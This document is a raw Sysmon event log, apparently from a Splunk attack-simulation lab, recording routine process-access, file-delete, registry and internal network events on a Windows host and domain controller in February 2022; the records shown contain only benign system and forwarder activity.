11:13:51.219{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220916Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:51.219{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220915Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:51.219{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220914Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:51.219{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220913Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:51.219{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220912Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:51.219{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220911Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:51.219{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-16EF-6216-0005-000000003902}3144C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220910Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:51.219{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-16EF-6216-0005-000000003902}3144C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220909Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:51.219{4F8D34B0-16EF-6216-0005-000000003902}3144C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000296928Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:51.786{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-157MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296927Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:48.577{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49400-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296926Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:51.067{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=6AC68925D2FCF1582F9A17EC03EB793C,SHA256=C6077E3DFB157403F2CA916B78F69CD281A93347CA6C17B3D6A7C6A6F01DCE86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296925Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:51.067{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=511EAE257FDF855C580D20F919BC84F6,SHA256=98F06B76B073C82BE0FD3C2801A4F16E6D8841FB7CD061B3609DA28A6D0CB3C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296935Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:52.936{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=754A11299690BBC0B10C0F509937835B,SHA256=A6FC93DAB4280BFA08B0184A475D60597CEF8BDF1B5304FE0E496E260A5C40E9,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000296934Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:13:52.668{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\6FC0DF5C-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_6FC0DF5C-0000-0000-0000-100000000000.XML 13241300x8000000000000000296933Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:13:52.668{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\BA30863B-E0B8-488B-829D-A0E9DE6AE59C\Config SourceDWORD (0x00000001) 13241300x8000000000000000296932Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:13:52.668{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\BA30863B-E0B8-488B-829D-A0E9DE6AE59C\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_BA30863B-E0B8-488B-829D-A0E9DE6AE59C.XML 10341000x8000000000000000296931Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:52.636{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296930Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:52.636{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000220924Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:50.607{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51613-false10.0.1.12-8000- 23542300x8000000000000000220923Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:52.312{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=12019EE6CE172D7450037B9EE66441F2,SHA256=CB699CD97401E8BE26E683F2E0913C595B256F8FE7C4482CCD09E7491E9FAEF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220922Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:52.125{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B717CDB695C45A0F7F0A8C58706DD2B,SHA256=F01E6AC7B6715E9C9353F72767E5EFCDFBEA4904FA7E340C7962400AE155599D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296938Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:53.522{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296937Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:53.522{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296936Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:53.522{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000220925Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:53.140{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11AAC764BC6DDB244DA280280974A10F,SHA256=9929891AEADB0054D4DD394AD3C02372BA9C6EC87E9A27515C251E411BAA9773,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296946Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:54.528{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296945Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:54.528{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296944Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:54.360{C8EA50B7-F11D-6215-0B00-000000003802}6286484C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296943Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:54.360{C8EA50B7-F11D-6215-0B00-000000003802}6286484C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296942Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:54.360{C8EA50B7-F11D-6215-0B00-000000003802}6286484C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000296941Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:52.113{C8EA50B7-F11F-6215-0D00-000000003802}888C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 